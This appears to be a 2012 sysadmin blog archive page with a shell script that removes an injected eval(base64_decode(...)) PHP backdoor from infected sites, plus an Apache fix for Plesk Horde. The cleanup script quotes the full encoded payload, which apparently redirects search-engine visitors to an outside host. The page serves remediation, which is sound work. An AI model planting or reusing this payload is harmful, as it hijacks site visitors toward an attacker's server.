Archive for July 2012

Script to replace the hack code from all php files

While working on a client’s  issue, I  came across a situation  where I have to  replace  the   hack/eval code from many PHP  files and hence thought of writing a small shell script that will  remove the hack/eval code from  all the infected PHP  files .

And I came up with the below simple shell script and thought of sharing it here 🙂 so that if anyone came across the same situation  then  he/she can use that script.

 

[email protected][#]  vi  hackreplace.sh
hacked='eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcGlvcG8uMjV1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));'
find -name \*.php | xargs replace $hacked ""  --

save and quit.

 

You can  execute the   hackreplace.sh file  as

 

[email protected][#]  sh  hackreplace.sh

  Note :: Just change the hack code in the “hacked”  variable as per your requirement.  

That’s all,  say thanks to  me 😛

Plesk Horde Internal Server Error

If you came across this error while access webmail using horde then there is no need to panic as you are getting that error because of PHP SuPHP  enabled for  every PHP script which runs under apache.

To fix this create a horde.conf file at /etc/httpd/conf.d and add the below contents

<Directory /usr/share/psa-horde>
 suPHP_Engine off
</Directory>

This will  disable suphp  engine for  /usr/share/psa-horde  directory and finally restart apache service for the changes to  take effect.

That’s all you are done.